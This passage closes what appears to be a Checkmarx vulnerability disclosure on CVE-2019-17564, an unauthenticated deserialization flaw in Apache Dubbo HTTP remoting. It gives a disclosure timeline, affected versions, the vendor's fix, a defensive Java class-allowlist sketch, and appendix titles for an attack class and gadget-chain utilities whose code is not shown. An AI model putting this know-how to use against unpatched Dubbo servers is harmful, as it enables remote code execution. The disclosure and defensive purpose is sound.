  • 6/9/2019 – Acknowledgement by Apache; the Dubbo team confirms that the issue is clear
  • 4/10/2019 – Dubbo team responds regarding technical specifics of the intended fix. Checkmarx responds by further explaining the issue – this is the first and last time technical issues are brought up by anyone at Apache in the context of this disclosure
  • 24/11/2019 – Reminder sent: 90 days have elapsed with no action on Apache’s part, and publication is imminent
  • 3/12/2019 – Apache requests more time to re-evaluate the issue before Checkmarx publishes its report. The request is granted, and Apache confirms two days later that a CVE will be issued and a proper fix released
  • 11/2/2020 – CVE-2019-17564 disclosed via the dev@dubbo.apache.org mailing list, roughly six months (about 180 days) after the original disclosure
  • 12/2/2020 – First POC emerges in the wild, but it does not contain the new gadget chain disclosed in this article

Package Versions

org.apache.dubbo.dubbo – 2.7.3
org.apache.dubbo.dubbo-remoting-http – 2.7.3
org.springframework.spring-web – 5.1.9.RELEASE

Vendor Mitigation

The Apache Dubbo team has resolved this issue by updating the FastJSON dependency, which provides JSONObject, to its latest version. This effectively breaks the current gadget chain. They have also replaced the deserialization mechanism used by the HTTP protocol, altering the communication protocol and ensuring that this specific exploit will not work.

Conclusions

The Dubbo HTTP Remoting service is vulnerable to unauthenticated Remote Code Execution, with virtually no prior knowledge required, other than a URL, for successful exploitation.
The root cause of this issue is the use of an unsafe Spring class, HttpInvokerServiceExporter, to bind the HTTP service. This class uses a standard Java ObjectInputStream with no security mechanism such as a class whitelist, which means deserialization can instantiate arbitrary classes whose deserialization process may trigger malicious code. Use of this class should be discontinued and replaced with a robust solution that whitelists the classes expected in Dubbo HTTP beans.
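
One common way to implement such a whitelist in plain Java is to subclass ObjectInputStream and override resolveClass, so that unexpected classes are rejected before they are instantiated. The sketch below is an illustration under that assumption, not the fix Dubbo shipped. The names AllowlistDemo, AllowlistObjectInputStream and readAllowed are hypothetical, and a real list must also contain every class nested inside the expected objects, including serializable superclasses.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.InvalidClassException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.ObjectStreamClass;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Date;
import java.util.HashSet;
import java.util.Set;

class AllowlistDemo {
    // Rejects any class descriptor whose name is not explicitly permitted.
    static class AllowlistObjectInputStream extends ObjectInputStream {
        private final Set<String> allowed;

        AllowlistObjectInputStream(InputStream in, Set<String> allowed) throws IOException {
            super(in);
            this.allowed = allowed;
        }

        @Override
        protected Class<?> resolveClass(ObjectStreamClass desc)
                throws IOException, ClassNotFoundException {
            if (!allowed.contains(desc.getName())) {
                throw new InvalidClassException(desc.getName(), "class not in allowlist");
            }
            return super.resolveClass(desc);
        }
    }

    static byte[] serialize(Object value) throws IOException {
        ByteArrayOutputStream buffer = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(buffer)) {
            out.writeObject(value);
        }
        return buffer.toByteArray();
    }

    static Object readAllowed(byte[] data, Set<String> allowed)
            throws IOException, ClassNotFoundException {
        try (ObjectInputStream in =
                 new AllowlistObjectInputStream(new ByteArrayInputStream(data), allowed)) {
            return in.readObject();
        }
    }

    public static void main(String[] args) throws Exception {
        Set<String> allowed = new HashSet<>(Arrays.asList("java.util.Date"));

        // An expected class passes through the filter.
        Object ok = readAllowed(serialize(new Date(0L)), allowed);
        System.out.println("accepted: " + ok.getClass().getName());

        // An unexpected class is rejected before it is instantiated.
        try {
            readAllowed(serialize(new ArrayList<String>()), allowed);
        } catch (InvalidClassException e) {
            System.out.println("rejected: " + e.classname);
        }
    }
}
```

Because the check runs on the class descriptor, a rejected class never reaches its own deserialization logic, which is the point at which a gadget chain would otherwise start.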
This type of research is part of the Checkmarx Security Research Team’s ongoing effort to drive necessary changes in software security practices across organizations and improve security for everyone.

Appendix 1

Appendix 1A: DubboGadget Class

A class for attacking a Dubbo HTTP instance

Appendix 1B: Utils Class

A utility class whose methods were used to build parts of the malicious gadget chain and to streamline reflection calls. It is derived largely from auxiliary classes and convenience methods in ysoserial by Chris Frohoff – https://github.com/frohoff/ysoserial. Additionally, makeXStringToStringTrigger is derived from prior research by Moritz Bechler, demonstrated in https://github.com/mbechler/marshalsec



Appendix 1C: pom.xml File for DubboGadget

Maven dependencies for DubboGadget

]]>